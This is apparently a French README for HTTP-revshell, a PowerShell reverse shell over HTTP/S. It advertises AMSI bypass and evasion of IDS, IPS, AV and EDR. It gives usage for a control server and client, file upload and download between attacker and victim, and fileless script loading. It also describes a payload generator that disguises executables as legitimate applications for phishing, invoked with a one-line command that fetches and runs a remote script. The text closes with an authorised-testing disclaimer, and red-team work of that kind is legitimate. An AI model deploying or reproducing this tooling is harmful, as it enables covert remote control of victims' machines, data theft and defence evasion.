
Reverse shell PowerShell utilisant le protocole HTTP/S avec contournement AMSI et compatible proxy
HTTP-revshell est un outil axé sur les exercices d'équipe rouge (redteam) et les testeurs de pénétration. Cet outil fournit une connexion inverse via le protocole http/s. Il utilise un canal caché pour prendre le contrôle de la machine victime via des requêtes web, contournant ainsi des solutions telles que l'IDS, l'IPS et l'AV.
NOTE : L'outil ne sera pas maintenu en termes de contournement. Avec seulement quelques modifications, vous pouvez contourner de nombreux EDR du marché.

Utilisation du serveur :
usage: server.py [-h] [--ssl] [--autocomplete] host port
positional arguments:
host Listen Host
port Listen Port
optional arguments:
-h, --help show this help message and exit
--ssl Send traffic over ssl
--autocomplete Autocomplete powershell functions
Utilisation du client :
Import-Module .\Invoke-WebRev.ps1
Invoke-WebRev -ip IP -port PORT [-ssl]
git clone https://github.com/3v4Si0N/HTTP-revshell.git
cd HTTP-revshell/
pip3 install -r requirements.txt
Cette fonction vous permet de téléverser n'importe quel fichier vers la machine victime.
Utilisation :
upload /src/path/file C:\dest\path\file
Cette fonction vous permet de télécharger un fichier vers la machine de l'attaquant.
Utilisation :
download C:\src\path\file /dst/path/file
Cette fonction vous permet de charger des scripts PowerShell sans avoir à écrire sur le disque de la victime, en lisant le fichier via un trafic HTTP légitime.
Utilisation :
loadps1 /path/to/the/local/server/PowershellScript.ps1
Ce script vous permet de créer un fichier exécutable avec le payload nécessaire pour utiliser HTTP-revshell, il vous suffit de suivre les instructions à l'écran pour le générer. Il existe 6 modèles prédéfinis et un personnalisable, avec les données que vous souhaitez.
Les payloads générés par l'outil intègrent l'icône légitime de l'application, ainsi que les informations sur le produit et le copyright de l'application d'origine. De plus, chacun d'eux ouvre l'application d'origine avant d'établir la connexion avec le serveur, se faisant passer pour une application légitime. Cela peut être utilisé pour du phishing ou des exercices Red Team.
Utilisation du générateur de payload :
powershell "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"

IMPORTANT : Tous les champs des modèles prédéfinis sont automatiquement complétés en appuyant sur la touche Entrée.
Ce script est sous licence LGPLv3+. Lien direct vers la Licence.
HTTP-revshell doit être utilisé uniquement pour des tests de pénétration autorisés et/ou à des fins éducatives non lucratives. Toute utilisation abusive de ce logiciel n'engagera pas la responsabilité de l'auteur ou de tout autre collaborateur. Utilisez-le sur vos propres serveurs et/ou avec l'autorisation du propriétaire du serveur.